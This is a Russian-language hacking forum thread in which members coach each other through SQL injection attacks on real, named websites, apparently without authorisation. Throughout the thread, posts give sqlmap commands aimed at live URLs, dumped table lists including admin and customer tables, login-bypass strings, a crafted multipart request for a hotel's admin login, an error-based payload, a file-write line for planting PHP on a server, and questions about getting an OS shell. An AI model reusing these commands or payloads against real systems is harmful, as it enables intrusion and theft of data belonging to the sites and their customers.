Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    _________________________
  2. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Объясните, пожалуйста, почему так?
    Почему "5063" и "tviX"?
     
  3. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    _________________________
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    это sqlmap так выдает.
    у вас фильтр на SELECT, и не в запросе в базу, а в POST/GET/COOKIE запросах. подобрать вектор вряд ли удастся, SELECT нужен везде.
     
    _________________________
    frank likes this.
  5. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Последний раз я этим занимался лет 7 назад. По необходимости. Потом забросил.
    Пришлось вернуться и столько много всего..вектора, новые методы атак. Новые приложения.
    Все руками делал, а сейчас с помощью программы вытаскивать данные не составляет проблемы.
    Все так упрощенно и просто.

    В целом, я разобрался с этим.
    Но вопрос с админкой - остался открытым.
    Как обойти фильтрацию, если "Admin' --" не принимает? и тому подобное.
     
  6. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Не могу выдернуть список таблиц.
    Запрос стандартный
    root@localhost:~# sqlmap -u "http://www.kazanboats.ru/index.php?id=59" --tables -D etyle2_kazboats
    и такой
    root@localhost:~# sqlmap -u "http://www.kazanboats.ru/index.php?id=59" --tables -D --no-cast etyle2_kazboats

    Программа перебирает таблицы из словаря и пишет, что они не найдены.
    Неужели оттого, что фильтруется select?
    Code:
    root@localhost:~# sqlmap -u "http://www.kazanboats.ru/index.php?id=59" --tables  -D --no-cast etyle2_kazboats
    
      sqlmap/1.0-dev - automatic SQL injection and database takeover tool
      http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 09:36:54
    
    [09:36:55] [INFO] resuming back-end DBMS 'mysql'
    [09:36:55] [INFO] testing connection to the target URL
    [09:36:55] [INFO] heuristics detected web page charset 'windows-1251'
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
      Type: boolean-based blind
      Title: AND boolean-based blind - WHERE or HAVING clause
      Payload: id=59' AND 2198=2198 AND 'naaT'='naaT
    
      Type: AND/OR time-based blind
      Title: MySQL > 5.0.11 AND time-based blind
      Payload: id=59' AND SLEEP(5) AND 'GtmX'='GtmX
    ---
    [09:36:55] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx, PHP 5.3.29
    back-end DBMS: MySQL 5.0.11
    [09:36:55] [INFO] fetching tables for database: '--no-cast'
    [09:36:55] [INFO] fetching number of tables for database '--no-cast'
    [09:36:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:36:55] [INFO] retrieved:
    [09:36:56] [WARNING] time-based comparison requires larger statistical model, please wait...........................
    [09:37:07] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
    
    [09:37:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [09:37:07] [WARNING] unable to retrieve the number of tables for database '--no-cast'
    [09:37:07] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] N
    No tables found
    [09:37:11] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.kazanboats.ru'
    
    [*] shutting down at 09:37:11
    
    
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    чтобы вывести имя бд SELECT не нужен, просто database() или schema(). а для вывода таблиц через blind синтаксис только с SELECT. вы же из базы достаете информацию, куда вы без выборки? я пробовал обойти - не выходит
     
    _________________________
  8. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Понял. Спасибо большое.
    Тогда можно ли при помощи sqlmap выдернуть или авторизоваться через http://www.kazanboats.ru/admin/login.php?
    Комбинация admin' : " or 1=1/* ' or 1=1--,
    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or 'a'='a
    " or "a"="a
    ') or ('a'='a

    Почему-то не проходят.
    Это связанно с фильтрацией или с неправильно составленным запросом?
     
  9. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Да
    Code:
    -u "http://www.kazanboats.ru/admin/login.php" --eta --random-agent --threads=8   --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
    Database: etyle2_kazboats
    [25 tables]
    +-------------------------+
    | kboats_adm_groups |
    | kboats_adm_log |
    | kboats_adm_users |
    | kboats_foto |
    | kboats_foto_category |
    | kboats_guestbook |
    | kboats_guestbook_conf |
    | kboats_guestbook_golos |
    | kboats_news |
    | kboats_news_banner |
    | kboats_news_cat |
    | kboats_news_comments |
    | kboats_news_conf |
    | kboats_news_users |
    | kboats_site_banner |
    | kboats_site_content |
    | kboats_site_menu |
    | kboats_site_modules |
    | kboats_site_option |
    | kboats_stock |
    | kboats_stock_brands |
    | kboats_stock_cat_option |
    | kboats_stock_category |
    | ksz_admin_menu |
    | ksz_info |
    +-------------------------+
     
    _________________________
    sepo, Br@!ns, Muracha and 1 other person like this.
  10. reuvenmatbil

    reuvenmatbil New Member

    Joined:
    1 Sep 2012
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    при запуске sqlmap с параметром --os-shell
    выдает
    [06:35:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell>

    как дальше действовать чтоб получить доступ, какие команды существуют?
    права на запись есть
     
  11. man4747

    man4747 New Member

    Joined:
    23 Jun 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    select '<?php phpinfo(); ?>' into outfile '/[full_path]/x.php';
     
    _________________________
    grimnir, reuvenmatbil and frank like this.
  13. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Почему на другую версию движка запрос типа
    Code:
    "-u "www.bogema-hotel.ru/access_admin.php" --eta --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
    записает на идеинтичном запросе?
    В прошлый раз на прошлом сайте получилось выдернуть логин и пароль, а тут блок какой-то..
    Code:
    "
    sqlmap.py -u "http://www.bogema-hotel.ru" --eta --random-agent
    --threads=8   --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --curr
    ent-db  --column --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
             _
    ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150622}
    |_ -| . | |     | .'| . |
    |___|_  |_|_|_|_|__,|  _|
          |_|           |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
    consent is illegal. It is the end user's responsibility to obey all applicable
    local, state and federal laws. Developers assume no liability and are not respon
    sible for any misuse or damage caused by this program
    
    [*] starting at 15:24:53
    
    [15:24:53] [INFO] fetched random HTTP User-Agent header from file '
    indows; U; Windows NT 6.1; zh-TW; rv:1.9.2.13) Gecko/20101203 AskTbPTV/3.9.1.140
    19 Firefox/3.6.13'
    custom injection marking character ('*') found in option '--data'. Do you want t
    o process it? [Y/n/q] n
    [15:24:56] [INFO] testing connection to the target URL
    [15:24:56] [INFO] heuristics detected web page charset 'windows-1251'
    [15:24:56] [INFO] testing if the target URL is stable. This can take a couple of
    seconds
    [15:24:57] [INFO] target URL is stable
    [15:24:57] [INFO] testing if POST parameter 'auth_login' is dynamic
    [15:24:57] [WARNING] POST parameter 'auth_login' does not appear dynamic
    [15:24:58] [WARNING] heuristic (basic) test shows that POST parameter 'auth_logi
    n' might not be injectable
    [15:24:58] [INFO] testing for SQL injection on POST parameter 'auth_login'
    [15:24:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [15:25:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
    eric comment)'
    [15:26:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
    QL comment)'
    [15:26:34] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDE
    R BY or GROUP BY clause'
    [15:27:07] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
    BY or GROUP BY clause (MAKE_SET)'
    [15:27:38] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
    BY or GROUP BY clause (ELT)'
    [15:28:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
    BY or GROUP BY clause (bool*int)'
    [15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
    
    [15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
    (original value)'
    [15:28:44] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'
    [15:28:44] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (
    original value)'
    [15:28:45] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S
    ET)'
    [15:28:46] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S
    ET - original value)'
    [15:28:46] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
    [15:28:47] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT -
    original value)'
    [15:28:47] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*i
    nt)'
    [15:28:48] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*i
    nt - original value)'
    [15:28:48] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY
    clause'
    [15:28:49] [WARNING] reflective value(s) found and filtering out
    [15:28:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY
    clause (original value)'
    [15:28:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY
    clause'
    [15:28:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY
    clause (original value)'
    [15:28:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
    [15:29:25] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
    [15:29:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
    Y or GROUP BY clause'
    [15:30:06] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
    Y or GROUP BY clause (EXTRACTVALUE)'
    [15:30:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
    Y or GROUP BY clause (UPDATEXML)'
    [15:30:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
    Y or GROUP BY clause (BIGINT UNSIGNED)'
    [15:30:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
    Y or GROUP BY clause'
    [15:30:43] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
    VALUE)'
    [15:30:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
    [15:30:52] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
    VALUE)'
    [15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
    ML)'
    [15:30:53] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
    UNSIGNED)'
    [15:30:53] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
    
    [15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
    (EXTRACTVALUE)'
    [15:30:54] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
    (UPDATEXML)'
    [15:30:54] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause
    (BIGINT UNSIGNED)'
    [15:30:54] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
    
    [15:30:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 66 columns (custom)
    '"
     
    #253 Muracha, 23 Jun 2015
    Last edited: 23 Jun 2015
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    значит нужно подобрать вектор вручную и посмотреть, что не так

    Code:
    http://www.arbet.am/search.php?CategoryID=1|extractvalue(1,concat(0x3a,version()))
     
    _________________________
    grimnir, BigBear and kingbeef like this.
  15. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Потому что там запрос другой multipart
    создаете файл request.txt в него код
    Code:
    POST /access_admin.php HTTP/1.1
    Content-Length: 586
    Content-Type: multipart/form-data; boundary=----Exploit_Code
    Cookie: PHPSESSID=e2fa5bb7d6518aa7b7f3a206febdcff0
    Host: www.bogema-hotel.ru
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
    Accept: */*
    
    ------Exploit_Code
    Content-Disposition: form-data; name="authorize"
    
    1
    ------Exploit_Code
    Content-Disposition: form-data; name="login"
    
    1*
    ------Exploit_Code
    Content-Disposition: form-data; name="password"
    
    g00dPa$$w0rD
    ------Exploit_Code--
    дальше python.exe "путь_до\sql\sqlmap.py" -r "путь_до\sql\request.txt" --eta --random-agent --threads=10 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=E --dbs
    Database: ironlogix_bgmh
    [24 tables]
    +------------------------------+
    | SS_aux |
    | SS_brand |
    | SS_categories |
    | SS_category_product |
    | SS_currency_types |
    | SS_customers |
    | SS_manager |
    | SS_manager_dany |
    | SS_news |
    | SS_order_status |
    | SS_ordered_carts |
    | SS_orders |
    | SS_pages |
    | SS_payment |
    | SS_payoption |
    | SS_product_options |
    | SS_product_options_values |
    | SS_products |
    | SS_products_opt_val_variants |
    | SS_review |
    | SS_share |
    | SS_special_offers |
    | SS_tags |
    | SS_thumb |
    +------------------------------+
     
    _________________________
    yarbabin, BigBear and Muracha like this.
  16. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Есть форум http://forum.chindirchero.ru/
    В поле обновления по адресу "http://forum.chindirchero.ru/upgrade/"
    Если вбить \1\ и \1\ появляется ошибка:
    Code:
    SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='\1\'
    
    Ñîîáùåíèå ñåðâåðà: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\1\'' at line 1
    Êîä îøèáêè: 1064
    Âðåìÿ: Wednesday 24th o June 2015 12:04:17 PM
    
    Можно ли с помощью sqlmap выдернуть данные?

    При составлении запроса и корректировки у меня sqlmap ругался на следующее и писал 404
    Может, я неправильно составил запрос?

    Code:
    indows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 (.NET
     CLR 3.5.30729)'
    Multipart-like data found in POST data. Do you want to process it? [Y/n/q] Y
    [13:11:29] [INFO] testing connection to the target URL
    [13:11:29] [CRITICAL] page not found (404)
    it is not recommended to continue in this kind of cases. Do you want to quit and
     make sure that everything is set up properly? [Y/n] Y
    [13:11:30] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 1 times
    
    Code:
    POST /index.php HTTP/1.1
    Content-Length: 586
    Content-Type: multipart/form-data; boundary=----Exploit_Code
    Cookie: PHPSESSID=e2fa5bb7d6518aa7b7f3a206febdcff0
    Host: www.forum.chindirchero.ru/upgrade/index.php
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
    Accept: */*
    
    ------Exploit_Code
    Content-Disposition: form-data; name="username"
    
    \1\
    ------Exploit_Code
    Content-Disposition: form-data; name="username"
    
    \1\
    ------Exploit_Code
    Content-Disposition: form-data; name="password"
    
    g00dPa$$w0rD
    ------Exploit_Code--
     
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Ну давай рассмотрим запрос:

    Code:
    SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='\1\'

    Ругается на незакрытую кавычку, так как обратный слэш экранирует кавычку, подставляемую по умолчанию.

    Можно ли пропихнуть свой пэйлоад? Теоретически можно, если:

    1) У тебя есть второй параметр в запросе, который мы можем контролировать. То есть первым параметром мы экранируем кавычку, превращая дальнейший запрос в строковое значение, а вторым параметром прокидываем свою нагрузку.

    У тебя в запросе участвует только одна переменная, поэтому это - не наш случай.

    Значит нужно пытаться дополнить запрос в рамках одной переменной.

    Но для этого, нам надо закрыть первую кавычку.

    2) Обязательным условием должно являться, чтобы кавычка не преобразовывалась, а проходила в чистом виде.

    Проверяем:

    123'\

    Response
    Code:
    SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='123&#39;\'
    Как видим, кавычка энкодится. Тухлый вариант.

    Самый максимум этой баги - узнать текущий префикс к таблицам.
     
    _________________________
    grimnir, frank and Muracha like this.
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    разобрался, в чем проблема.
    Code:
    SELECT manager, password from SS_manager
    NULL. из-за того, что записей нет и не возможно залогиниться даже обойдя авторизацию.
     
    _________________________
    grimnir likes this.
  19. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Да разве? Как сказал kingbeef, можно использовать error-based векторы. С помощью них можно увидеть записи воочию.

    Обойти авторизацию подстановками вроде ' or 1=1 # не получается из-за того, что в запросе участвует только поле login. Соответствие паролей проверяет php скрипт. Варианты:
    1. Вывести записи и подставить их в форму.
    2. Если записей действительно нет, или в них присутствуют непробиваемые хэши, подставить с помощью UNION свои и ввести в поле пароля соответствующий пароль.
     
    YaBtr likes this.
  20. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    я правильно понял, что такое сработает только при наличии соответствующих прав?
     
    _________________________